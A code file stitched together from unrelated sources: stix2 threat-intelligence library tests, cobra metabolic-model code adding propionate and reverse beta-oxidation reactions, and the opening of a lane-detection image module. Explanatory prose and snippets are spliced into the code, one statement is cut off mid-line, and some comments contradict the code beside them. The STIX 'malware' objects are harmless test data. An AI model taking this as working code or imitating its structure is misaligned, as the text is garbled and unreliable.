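factory = DefaultsFactory(created_by_ref="identity--abc")
obj = factory.create(dict, name="indicator-1")
```

stix2's factory adds list handling on top of this (the `list_append` behaviour tested above); the sketch shows only plain override semantics.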
def test_environment_functions():
env = stix2.Environment(
stix2.ObjectFactory(created_by_ref=IDENTITY_ID),
stix2.MemoryStore(),
)
# Create a STIX object
ind = env.create(stix2.v21.Indicator, id=INDICATOR_ID, **INDICATOR_KWARGS)
assert ind.created_by_ref == IDENTITY_ID
# Add objects to datastore
ind2 = ind.new_version(labels=['benign'])
env.add([ind, ind2])
# Get both versions of the object
resp = env.all_versions(INDICATOR_ID)
assert len(resp) == 2
# Get just the most recent version of the object
resp = env.get(INDICATOR_ID)
assert resp['labels'][0] == 'benign'
# Search on something other than id
query = [stix2.Filter('type', '=', 'vulnerability')]
resp = env.query(query)
assert len(resp) == 0
# See different results after adding filters to the environment
env.add_filters([
stix2.Filter('type', '=', 'indicator'),
stix2.Filter('created_by_ref', '=', IDENTITY_ID),
])
env.add_filter(stix2.Filter('labels', '=', 'benign')) # should be 'malicious-activity'
resp = env.get(INDICATOR_ID)
assert resp['labels'][0] == 'benign' # should be 'malicious-activity'
def test_environment_source_and_sink():
ind = stix2.v21.Indicator(id=INDICATOR_ID, **INDICATOR_KWARGS)
env = stix2.Environment(source=stix2.MemorySource([ind]), sink=stix2.MemorySink([ind]))
assert env.get(INDICATOR_ID).indicator_types[0] == 'malicious-activity'
def test_environment_datastore_and_sink():
with pytest.raises(ValueError) as excinfo:
stix2.Environment(
factory=stix2.ObjectFactory(),
store=stix2.MemoryStore(), sink=stix2.MemorySink,
)
assert 'Data store already provided' in str(excinfo.value)
def test_environment_no_datastore():
env = stix2.Environment(factory=stix2.ObjectFactory())
with pytest.raises(AttributeError) as excinfo:
env.add(stix2.v21.Indicator(**INDICATOR_KWARGS))
assert 'Environment has no data sink to put objects in' in str(excinfo.value)
with pytest.raises(AttributeError) as excinfo:
env.get(INDICATOR_ID)
assert 'Environment has no data source' in str(excinfo.value)
with pytest.raises(AttributeError) as excinfo:
env.all_versions(INDICATOR_ID)
assert 'Environment has no data source' in str(excinfo.value)
with pytest.raises(AttributeError) as excinfo:
env.query(INDICATOR_ID)
assert 'Environment has no data source' in str(excinfo.value)
with pytest.raises(AttributeError) as excinfo:
env.relationships(INDICATOR_ID)
assert 'Environment has no data source' in str(excinfo.value)
with pytest.raises(AttributeError) as excinfo:
env.related_to(INDICATOR_ID)
assert 'Environment has no data source' in str(excinfo.value)
def test_environment_add_filters():
env = stix2.Environment(factory=stix2.ObjectFactory())
env.add_filters([INDICATOR_ID])
env.add_filter(INDICATOR_ID)
def test_environment_datastore_and_no_object_factory():
# Uses a default object factory
env = stix2.Environment(store=stix2.MemoryStore())
ind = env.create(stix2.v21.Indicator, id=INDICATOR_ID, **INDICATOR_KWARGS)
assert ind.id == INDICATOR_ID
def test_parse_malware():
env = stix2.Environment()
data = """{
"type": "malware",
"spec_version": "2.1",
"id": "malware--9c4638ec-f1de-4ddb-abf4-1b760417654e",
"created": "2017-01-01T12:34:56.000Z",
"modified": "2017-01-01T12:34:56.000Z",
"name": "Cryptolocker",
"malware_types": [
"ransomware"
],
"is_family": false
}"""
mal = env.parse(data, version="2.1")
assert mal.type == 'malware'
assert mal.spec_version == '2.1'
assert mal.id == MALWARE_ID
assert mal.created == FAKE_TIME
assert mal.modified == FAKE_TIME
assert mal.malware_types == ['ransomware']
assert mal.name == "Cryptolocker"
assert not mal.is_family
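`env.parse` turns the JSON above into a typed Malware object. With the stdlib alone, the same raw fields can be decoded and inspected as a plain dict (a sketch, not stix2's parser; the JSON is a trimmed copy of the test's input):

```python
import json

# Decode the malware JSON from test_parse_malware with json.loads and
# inspect the raw fields that the typed object exposes as attributes.
data = json.loads("""{
    "type": "malware",
    "spec_version": "2.1",
    "id": "malware--9c4638ec-f1de-4ddb-abf4-1b760417654e",
    "name": "Cryptolocker",
    "malware_types": ["ransomware"],
    "is_family": false
}""")
```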
def test_creator_of():
identity = stix2.v21.Identity(**IDENTITY_KWARGS)
factory = stix2.ObjectFactory(created_by_ref=identity.id)
env = stix2.Environment(store=stix2.MemoryStore(), factory=factory)
env.add(identity)
ind = env.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
creator = env.creator_of(ind)
assert creator is identity
def test_creator_of_no_datasource():
identity = stix2.v21.Identity(**IDENTITY_KWARGS)
factory = stix2.ObjectFactory(created_by_ref=identity.id)
env = stix2.Environment(factory=factory)
ind = env.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
with pytest.raises(AttributeError) as excinfo:
env.creator_of(ind)
assert 'Environment has no data source' in str(excinfo.value)
def test_creator_of_not_found():
identity = stix2.v21.Identity(**IDENTITY_KWARGS)
factory = stix2.ObjectFactory(created_by_ref=identity.id)
env = stix2.Environment(store=stix2.MemoryStore(), factory=factory)
ind = env.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
creator = env.creator_of(ind)
assert creator is None
def test_creator_of_no_created_by_ref():
env = stix2.Environment(store=stix2.MemoryStore())
ind = env.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
creator = env.creator_of(ind)
assert creator is None
def test_relationships(ds):
env = stix2.Environment(store=ds)
mal = env.get(MALWARE_ID)
resp = env.relationships(mal)
assert len(resp) == 3
assert any(x['id'] == RELATIONSHIP_IDS[0] for x in resp)
assert any(x['id'] == RELATIONSHIP_IDS[1] for x in resp)
assert any(x['id'] == RELATIONSHIP_IDS[2] for x in resp)
def test_relationships_no_id(ds):
env = stix2.Environment(store=ds)
mal = {
"type": "malware",
"name": "some variant",
}
with pytest.raises(ValueError) as excinfo:
env.relationships(mal)
assert "object has no 'id' property" in str(excinfo.value)
def test_relationships_by_type(ds):
env = stix2.Environment(store=ds)
mal = env.get(MALWARE_ID)
resp = env.relationships(mal, relationship_type='indicates')
assert len(resp) == 1
assert resp[0]['id'] == RELATIONSHIP_IDS[0]
def test_relationships_by_source(ds):
env = stix2.Environment(store=ds)
resp = env.relationships(MALWARE_ID, source_only=True)
assert len(resp) == 1
assert resp[0]['id'] == RELATIONSHIP_IDS[1]
def test_relationships_by_target(ds):
env = stix2.Environment(store=ds)
resp = env.relationships(MALWARE_ID, target_only=True)
assert len(resp) == 2
assert any(x['id'] == RELATIONSHIP_IDS[0] for x in resp)
assert any(x['id'] == RELATIONSHIP_IDS[2] for x in resp)
def test_relationships_by_target_and_type(ds):
env = stix2.Environment(store=ds)
resp = env.relationships(MALWARE_ID, relationship_type='uses', target_only=True)
assert len(resp) == 1
assert any(x['id'] == RELATIONSHIP_IDS[2] for x in resp)
def test_relationships_by_target_and_source(ds):
env = stix2.Environment(store=ds)
with pytest.raises(ValueError) as excinfo:
env.relationships(MALWARE_ID, target_only=True, source_only=True)
assert 'not both' in str(excinfo.value)
def test_related_to(ds):
env = stix2.Environment(store=ds)
mal = env.get(MALWARE_ID)
resp = env.related_to(mal)
assert len(resp) == 3
assert any(x['id'] == CAMPAIGN_ID for x in resp)
assert any(x['id'] == INDICATOR_ID for x in resp)
assert any(x['id'] == IDENTITY_ID for x in resp)
def test_related_to_no_id(ds):
env = stix2.Environment(store=ds)
mal = {
"type": "malware",
"name": "some variant",
"is_family": False,
}
with pytest.raises(ValueError) as excinfo:
env.related_to(mal)
assert "object has no 'id' property" in str(excinfo.value)
def test_related_to_by_source(ds):
env = stix2.Environment(store=ds)
resp = env.related_to(MALWARE_ID, source_only=True)
assert len(resp) == 1
assert resp[0]['id'] == IDENTITY_ID
def test_related_to_by_target(ds):
env = stix2.Environment(store=ds)
resp = env.related_to(MALWARE_ID, target_only=True)
assert len(resp) == 2
assert any(x['id'] == CAMPAIGN_ID for x in resp)
assert any(x['id'] == INDICATOR_ID for x in resp)
def test_semantic_equivalence_on_same_attack_pattern1():
ap1 = stix2.v21.AttackPattern(id=ATTACK_PATTERN_ID, **ATTACK_PATTERN_KWARGS)
ap2 = stix2.v21.AttackPattern(id=ATTACK_PATTERN_ID, **ATTACK_PATTERN_KWARGS)
env = stix2.Environment().semantically_equivalent(ap1, ap2)
assert round(env) == 100
def test_semantic_equivalence_on_same_attack_pattern2():
ATTACK_KWARGS = dict(
name="Phishing",
external_references=[
{
"url": "https://example2",
"source_name": "some-source2",
},
],
)
ap1 = stix2.v21.AttackPattern(id=ATTACK_PATTERN_ID, **ATTACK_KWARGS)
ap2 = stix2.v21.AttackPattern(id=ATTACK_PATTERN_ID, **ATTACK_KWARGS)
env = stix2.Environment().semantically_equivalent(ap1, ap2)
assert round(env) == 100
def test_semantic_equivalence_on_same_campaign1():
camp1 = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMPAIGN_KWARGS)
camp2 = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMPAIGN_KWARGS)
env = stix2.Environment().semantically_equivalent(camp1, camp2)
assert round(env) == 100
def test_semantic_equivalence_on_same_campaign2():
CAMP_KWARGS = dict(
name="Green Group Attacks Against Finance",
description="Campaign by Green Group against a series of targets in the financial services sector.",
aliases=["super-green", "some-green"],
)
camp1 = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMP_KWARGS)
camp2 = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMP_KWARGS)
env = stix2.Environment().semantically_equivalent(camp1, camp2)
assert round(env) == 100
def test_semantic_equivalence_on_same_identity1():
iden1 = stix2.v21.Identity(id=IDENTITY_ID, **IDENTITY_KWARGS)
iden2 = stix2.v21.Identity(id=IDENTITY_ID, **IDENTITY_KWARGS)
env = stix2.Environment().semantically_equivalent(iden1, iden2)
assert round(env) == 100
def test_semantic_equivalence_on_same_identity2():
IDEN_KWARGS = dict(
name="<NAME>",
identity_class="individual",
sectors=["government", "critical-infrastructure"],
)
iden1 = stix2.v21.Identity(id=IDENTITY_ID, **IDEN_KWARGS)
iden2 = stix2.v21.Identity(id=IDENTITY_ID, **IDEN_KWARGS)
env = stix2.Environment().semantically_equivalent(iden1, iden2)
assert round(env) == 100
def test_semantic_equivalence_on_same_indicator():
ind1 = stix2.v21.Indicator(id=INDICATOR_ID, **INDICATOR_KWARGS)
ind2 = stix2.v21.Indicator(id=INDICATOR_ID, **INDICATOR_KWARGS)
env = stix2.Environment().semantically_equivalent(ind1, ind2)
assert round(env) == 100
def test_semantic_equivalence_on_same_location1():
location_kwargs = dict(latitude=45, longitude=179)
loc1 = stix2.v21.Location(id=LOCATION_ID, **location_kwargs)
loc2 = stix2.v21.Location(id=LOCATION_ID, **location_kwargs)
env | |
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({pp2coa_SEOc: -1.0,
h_SEOc: -1.0,
nadh_SEOc: -1.0,
nad_SEOc: 1.0,
ppcoa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#propionate CoA transferase
#ppcoa_SEOc + ac_SEOc <-> accoa_SEOc + ppa_SEOc
#Reaction not in BIGG Database
reaction = Reaction('SEO_PCT')
reaction.name = 'Propionate CoA Transferase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({ppcoa_SEOc: -1.0,
ac_SEOc: -1.0,
accoa_SEOc: 1.0,
ppa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#Methylmalonyl-CoA Pathway (Metacyc: Pyruvate fermentation to propanoate I)
#methylmalonyl-CoA carboxyltransferase
#mmcoa__S_SEOc + pyr_SEOc <-> ppcoa_SEOc + oaa_SEOc
mmcoa__S_SEOc = Metabolite('mmcoa__S_SEOc', formula='C25H35N7O19P3S', name='(S)-Methylmalonyl-CoA', compartment='SEOc', charge=-5)
oaa_SEOc = Metabolite('oaa_SEOc', formula='C4H2O5', name='Oxaloacetate', compartment='SEOc', charge=-2)
#Reaction not in BIGG database.
reaction = Reaction('SEO_MCC')
reaction.name = 'Methylmalonyl-CoA Carboxyltransferase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({mmcoa__S_SEOc: -1.0,
pyr_SEOc: -1.0,
ppcoa_SEOc: 1.0,
oaa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#malate dehydrogenase
#oaa_SEOc + nadh_SEOc + h_SEOc <-> nad_SEOc + mal__L_SEOc
mal__L_SEOc = Metabolite('mal__L_SEOc', formula='C4H4O5', name='L-Malate', compartment='SEOc', charge=-2)
reaction = Reaction('SEO_MDH')
reaction.name = 'Malate dehydrogenase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({oaa_SEOc: -1.0,
nadh_SEOc: -1.0,
h_SEOc: -1.0,
nad_SEOc: 1.0,
mal__L_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#fumarase
#mal__L_SEOc <-> h2o_SEOc + fum_SEOc
fum_SEOc = Metabolite('fum_SEOc', formula='C4H2O4', name='Fumarate', compartment='SEOc', charge=-2)
reaction = Reaction('SEO_FUM')
reaction.name = 'Fumarase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({mal__L_SEOc: -1.0,
h2o_SEOc: 1.0,
fum_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#fumarate reductase NADH
#fum_SEOc + nadh_SEOc + h_SEOc <-> nad_SEOc + succ_SEOc
succ_SEOc = Metabolite('succ_SEOc', formula='C4H4O4', name='Succinate', compartment='SEOc', charge=-2)
reaction = Reaction('SEO_FRDx')
reaction.name = 'Fumarate Reductase NADH'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({fum_SEOc: -1.0,
nadh_SEOc: -1.0,
h_SEOc: -1.0,
nad_SEOc: 1.0,
succ_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#Propanoyl-CoA: succinate CoA-transferase
#succ_SEOc + ppcoa_SEOc <-> ppa_SEOc + succoa_SEOc
succoa_SEOc = Metabolite('succoa_SEOc', formula='C25H35N7O19P3S', name='Succinyl-CoA', compartment='SEOc', charge=-5)
reaction = Reaction('SEO_PPCSCT')
reaction.name = 'Propanoyl-CoA: succinate CoA-transferase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({succ_SEOc: -1.0,
ppcoa_SEOc: -1.0,
ppa_SEOc: 1.0,
succoa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#Methylmalonyl-CoA mutase
#succoa_SEOc <-> mmcoa__R_SEOc
mmcoa__R_SEOc = Metabolite('mmcoa__R_SEOc', formula='C25H35N7O19P3S', name='(R)-Methylmalonyl-CoA', compartment='SEOc', charge=-5)
reaction = Reaction('SEO_MMM2')
reaction.name = 'Methylmalonyl-CoA mutase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({succoa_SEOc: -1.0,
mmcoa__R_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#Methylmalonyl-CoA epimerase
#mmcoa__R_SEOc <-> mmcoa__S_SEOc
reaction = Reaction('SEO_MME')
reaction.name = 'Methylmalonyl-CoA epimerase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({mmcoa__R_SEOc: -1.0,
mmcoa__S_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
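Every `check_mass_balance()` call above verifies that the stoichiometric coefficients cancel element-for-element across the reaction. A minimal sketch of that idea with a tiny formula parser (an illustration only, not cobra's implementation, and it ignores charge balance):

```python
import re
from collections import Counter

def parse_formula(formula):
    # Split e.g. "C4H4O5" into element counts: {"C": 4, "H": 4, "O": 5}
    counts = Counter()
    for elem, num in re.findall(r"([A-Z][a-z]?)(\d*)", formula):
        counts[elem] += int(num) if num else 1
    return counts

def mass_balance(stoichiometry):
    # stoichiometry maps formula strings to coefficients; a balanced
    # reaction sums to zero for every element, so the result is empty.
    balance = Counter()
    for formula, coeff in stoichiometry.items():
        for elem, n in parse_formula(formula).items():
            balance[elem] += coeff * n
    return {e: n for e, n in balance.items() if n != 0}
```

Applied to the fumarase reaction above (mal__L -> h2o + fum), the carbons (-4 + 4), hydrogens (-4 + 2 + 2), and oxygens (-5 + 1 + 4) all cancel, so the balance comes back empty.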
##Odd-chain reverse beta-oxidation
#Pentanoate production (Cycle 1)
#accoa_SEOc + ppcoa_SEOc <-> coa_SEOc + 3optcoa_SEOc
_3optcoa_SEOc = Metabolite('_3optcoa_SEOc', formula='C26H38N7O18P3S', name='3-Oxopentanoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_VCACT')
reaction.name = 'Acetyl-CoA C-acyltransferase (3-oxovaleryl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({accoa_SEOc: -1.0,
ppcoa_SEOc: -1.0,
_3optcoa_SEOc: 1.0,
coa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#h_SEOc + nadh_SEOc + 3optcoa_SEOc <-> nad_SEOc + 3hptcoa_SEOc
_3hptcoa_SEOc = Metabolite('_3hptcoa_SEOc', formula='C26H40N7O18P3S', name='3-Hydroxypentanoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_HVCD')
reaction.name = '3-hydroxyacyl-CoA dehydrogenase (3-oxovaleryl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({_3optcoa_SEOc: -1.0,
h_SEOc: -1.0,
nadh_SEOc: -1.0,
_3hptcoa_SEOc: 1.0,
nad_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#_3hptcoa_SEOc <-> h2o_SEOc + pt2coa_SEOc
pt2coa_SEOc = Metabolite('pt2coa_SEOc', formula='C26H38N7O17P3S', name='Pent-2-enoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_VECOAH')
reaction.name = '3-hydroxyacyl-CoA dehydratase (3-hydroxypentanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({_3hptcoa_SEOc: -1.0,
pt2coa_SEOc: 1.0,
h2o_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#pt2coa_SEOc + 2.0 nadh_SEOc + fdox_SEOc <-> ptcoa_SEOc + 2.0 nad_SEOc + fdred_SEOc
ptcoa_SEOc = Metabolite('ptcoa_SEOc', formula='C26H40N7O17P3S', name='Pentanoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_EBVCD')
#BiGG does not have an electron bifurcating acyl-CoA dehydrogenase reaction
reaction.name = '*Electron Bifurcating Acyl-CoA dehydrogenase (pentanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({pt2coa_SEOc: -1.0,
nadh_SEOc: -2.0,
fdox_SEOc: -1.0,
ptcoa_SEOc: 1.0,
nad_SEOc: 2.0,
fdred_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#h_SEOc + pt2coa_SEOc + nadh_SEOc <-> ptcoa_SEOc + nad_SEOc
reaction = Reaction('SEO_VCOAD')
reaction.name = "Acyl-CoA dehydrogenase (pentanoyl-CoA)"
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({pt2coa_SEOc: -1.0,
nadh_SEOc: -1.0,
h_SEOc: -1.0,
ptcoa_SEOc: 1.0,
nad_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#ptcoa_SEOc + h2o_SEOc <-> pta_SEOc + coa_SEOc + h_SEOc
pta_SEOc = Metabolite('pta_SEOc', formula='C5H9O2', name='Pentanoate', compartment='SEOc', charge= -1)
reaction = Reaction('SEO_ACHC5')
#BiGG does not have this specific acyl-CoA hydrolase reaction
reaction.name = '*Acyl-CoA Hydrolase (C5:0)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = 0. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({ptcoa_SEOc: -1.0,
h2o_SEOc: -1.0,
pta_SEOc: 1.0,
coa_SEOc: 1.0,
h_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#ptcoa_SEOc + ac_SEOc <-> pta_SEOc + accoa_SEOc
reaction = Reaction('SEO_CoATC5')
#BiGG does not have this specific acyl-CoA hydrolase reaction
reaction.name = '*CoA Transferase (C5:0-C2:0)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = 0. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({ptcoa_SEOc: -1.0,
ac_SEOc: -1.0,
pta_SEOc: 1.0,
accoa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
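Each reaction above repeats the same five steps: construct, name, assign a subsystem, set bounds, add stoichiometry. A small factory function removes that duplication; sketched here against a minimal stand-in for cobra's `Reaction` so the snippet is self-contained (with cobrapy installed, the real `Reaction` class should drop in for the stub):

```python
class Reaction:
    # Minimal stand-in mirroring the cobra.Reaction attributes used above.
    def __init__(self, rid):
        self.id = rid
        self.name = ''
        self.subsystem = ''
        self.lower_bound = 0.
        self.upper_bound = 1000.
        self.metabolites = {}

    def add_metabolites(self, stoich):
        self.metabolites.update(stoich)

def make_reaction(rid, name, stoich, subsystem='Reverse Beta Oxidation',
                  reversible=True):
    """Build a reaction using the bounds convention followed throughout this model:
    reversible reactions get (-1000, 1000), irreversible ones (0, 1000)."""
    rxn = Reaction(rid)
    rxn.name = name
    rxn.subsystem = subsystem
    rxn.lower_bound = -1000. if reversible else 0.
    rxn.upper_bound = 1000.
    rxn.add_metabolites(stoich)
    return rxn
```

With the real class, each block above then collapses to `model.add_reactions([make_reaction(...)])` plus the mass-balance print.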
#Heptanoate production (Cycle 2)
#accoa_SEOc + ppcoa_SEOc <-> coa_SEOc + 3optcoa_SEOc
#3-Oxoheptanoyl-CoA is only in BiGG as M00877. Will define as 3ohtcoa_SEOc
_3ohtcoa_SEOc = Metabolite('_3ohtcoa_SEOc', formula='C28H42N7O18P3S', name='3-Oxoheptanoyl-CoA', compartment='SEOc', charge=-4)
#Reaction not in BiGG Database
reaction = Reaction('SEO_VCACT2')
reaction.name = 'Acetyl-CoA C-acyltransferase (3-oxoheptanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({accoa_SEOc: -1.0,
ptcoa_SEOc: -1.0,
_3ohtcoa_SEOc: 1.0,
coa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#h_SEOc + nadh_SEOc + 3ohtcoa_SEOc <-> nad_SEOc + 3hhtcoa_SEOc
_3hhtcoa_SEOc = Metabolite('_3hhtcoa_SEOc', formula='C28H44N7O18P3S', name='3-Hydroxyheptanoyl-CoA', compartment='SEOc', charge=-4)
#Reaction is not in BiGG Database
reaction = Reaction('SEO_HVCD2')
reaction.name = '3-hydroxyacyl-CoA dehydrogenase (3-oxoheptanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({_3ohtcoa_SEOc: -1.0,
h_SEOc: -1.0,
nadh_SEOc: -1.0,
_3hhtcoa_SEOc: 1.0,
nad_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#_3hhtcoa_SEOc <-> h2o_SEOc + ht2coa_SEOc
ht2coa_SEOc = Metabolite('ht2coa_SEOc', formula='C28H42N7O17P3S', name='Hept-2-enoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_VECOAH2')
reaction.name = '3-hydroxyacyl-CoA dehydratase (3-hydroxyheptanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({_3hhtcoa_SEOc: -1.0,
ht2coa_SEOc: 1.0,
h2o_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#ht2coa_SEOc + 2.0 nadh_SEOc + fdox_SEOc <-> hptcoa_SEOc + 2.0 nad_SEOc + fdred_SEOc
hptcoa_SEOc = Metabolite('hptcoa_SEOc', formula='C28H44N7O17P3S', name='Heptanoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_EBVCD2')
#BiGG does not have an electron bifurcating acyl-CoA dehydrogenase reaction
reaction.name = '*Electron Bifurcating Acyl-CoA dehydrogenase (heptanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({ht2coa_SEOc: -1.0,
nadh_SEOc: -2.0,
fdox_SEOc: -1.0,
hptcoa_SEOc: 1.0,
nad_SEOc: 2.0,
fdred_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#h_SEOc + ht2coa_SEOc + nadh_SEOc <-> hptcoa_SEOc + nad_SEOc
reaction = Reaction('SEO_VCOAD2')
reaction.name = "Acyl-CoA dehydrogenase (heptanoyl-CoA)"
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({ht2coa_SEOc: -1.0,
nadh_SEOc: -1.0,
h_SEOc: -1.0,
hptcoa_SEOc: 1.0,
nad_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#LaneDetectionUtils.py
import os
import sys
import cv2
import numpy as np
np.seterr(all='raise')
import pickle
import configuration
from skimage.feature import hog
from skimage import exposure
from scipy import ndimage
'''
Read in stored camera calibrations
'''
def getCalibrationCoefficients(RelativePathtoCameraMatrix):
pathtoCameraCoefficients = os.path.join(RelativePathtoCameraMatrix, "wide_dist_pickle.p")
dist_pickle = pickle.load( open( pathtoCameraCoefficients, "rb" ) )
camera_matrix = dist_pickle["mtx"]
dist_coefs = dist_pickle["dist"]
return camera_matrix, dist_coefs
def customContrast(img):
# This picks out yellow and white colors from lane markings
# Yellow color is determine based on the color-combination of red, green and blue channels.
Yellow = np.zeros_like(img)
red_Channel = img[:, :, 0]
green_Channel = img[:, :, 1]
blue_Channel = img[:, :, 2]
Yellow[ (red_Channel > 150) & (green_Channel > 150) & (green_Channel >= 0.65*red_Channel) & (green_Channel < 1.35*red_Channel) & (blue_Channel<0.7*(np.maximum(red_Channel, green_Channel)))] = 1
White = np.zeros_like(img)
White[(red_Channel >= 175) & (green_Channel >= 175) & (blue_Channel >= 175)] = 1
contrastedImage = np.zeros_like(img)
contrastedImage[ (White==1) | (Yellow==1)] = 255
return contrastedImage.astype(np.uint8)
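The masking above is easier to see per pixel. A scalar version of the same rule (threshold constants copied from customContrast, mirroring the intended all-channels-bright white test; treat them as tuning constants, not ground truth):

```python
def is_lane_color(r, g, b):
    # Yellow: strong red and green, green within ~35% of red, blue suppressed
    yellow = (r > 150 and g > 150 and g >= 0.65 * r
              and g < 1.35 * r and b < 0.7 * max(r, g))
    # White: all three channels bright
    white = r >= 175 and g >= 175 and b >= 175
    return yellow or white
```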
def region_of_interest(img, vertices):
# Useful for blacking out uninteresting regions of image
#defining a blank mask to start with
mask = np.zeros_like(img)
#defining a 3 channel or 1 channel color to fill the mask with depending on the input image
if len(img.shape) > 2:
channel_count = img.shape[2] # i.e. 3 or 4 depending on your image
ignore_mask_color = (255,) * channel_count
else:
ignore_mask_color = 255
#filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, ignore_mask_color)
#returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image
def clipImages(img):
# Physically change the dimensions of image, based on the
# region of interest.
heightOfImage = img.shape[0]
widthOfImage = img.shape[1]
#Correct for any oddly shaped images
if((heightOfImage/720. < 1.1) and (heightOfImage/720. > 0.9)):
img = cv2.resize(img, (1280, 720), interpolation = cv2.INTER_AREA)
originalImage = np.copy(img)
#We resized the image to 1280x720
heightOfImage = 720
widthOfImage = 1280
#Create filter vertices
#Set vertices of masking polygon
#Offset mask horizontally from bottom left of image
horizontalMaskOffsetatBottomLeft = configuration.ClipOffsetXBottomLeft
#Offset mask horizontally from bottom right of image
